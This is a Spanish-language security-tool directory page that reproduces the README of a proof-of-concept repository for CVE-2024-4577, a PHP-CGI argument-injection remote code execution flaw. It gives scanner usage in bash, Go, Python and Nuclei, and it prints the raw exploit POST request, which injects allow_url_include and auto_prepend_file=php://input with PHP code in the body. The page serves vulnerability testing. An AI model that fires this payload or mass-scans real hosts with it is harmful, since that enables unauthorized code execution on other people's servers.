Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-4577-PHP-RCE — PHP RCE PoC para CVE-2024-4577 escrito en bash, go, python y una plantilla de nuclei | Kitploit
Herramientas/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PHP RCE PoC para CVE-2024-4577 escrito en bash, go, python y una plantilla de nuclei

Ver Repositorio
33132hace 1 mesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PHP RCE PoC

CVE-2024-4577: Inyección de Argumentos en PHP-CGI

Resumen

Este repositorio contiene scripts para verificar la vulnerabilidad CVE-2024-4577, un problema de inyección de argumentos en PHP-CGI. Puede usar los scripts Bash, Go y Python proporcionados para probar una lista de dominios para esta vulnerabilidad. También he publicado un archivo YAML de Nuclei.

Uso

Script Bash

Para usar el script Bash, ejecute el siguiente comando:

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

Script Go

Primero, guarde el script Go en un archivo llamado CVE-2024-4577.go. Para compilar y ejecutar el script Go:

  1. Compile el script Go en un binario:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • Ejecute el binario con el archivo de lista de dominios como argumento:

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    
  • Script Python

    Primero, guarde el script Python en un archivo llamado CVE-2024-4577.py. Para ejecutar el script Python:

    1. Asegúrese de tener instalada la biblioteca requests:

      root@kitploit:~
      pip install requests
      
    2. Ejecute el script Python con el archivo de lista de dominios como argumento:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list
      
    3. (Opcional) Si desea imprimir solo los hosts vulnerables:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list --quiet
      

    Explicación de la Prueba de Concepto (PoC)

    Para probar manualmente la vulnerabilidad, puede enviar la siguiente solicitud POST:

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    Plantilla de Nuclei

    También he creado una plantilla de Nuclei para escanear instancias vulnerables, utiliza el esquema de diseño v3 y ha sido probada en un entorno de laboratorio:

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <target-url>
    

    Ejemplo de Lista de Dominios

    La lista de dominios debe tener el prefijo http/https para asegurar que se lean correctamente.

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    Ejemplo de Salida

    Si se encuentra que un dominio es vulnerable, la salida será:

    root@kitploit:~
    http://example.com: Vulnerable
    http://vulnerablesite.com: Vulnerable
    
    Descargar herramienta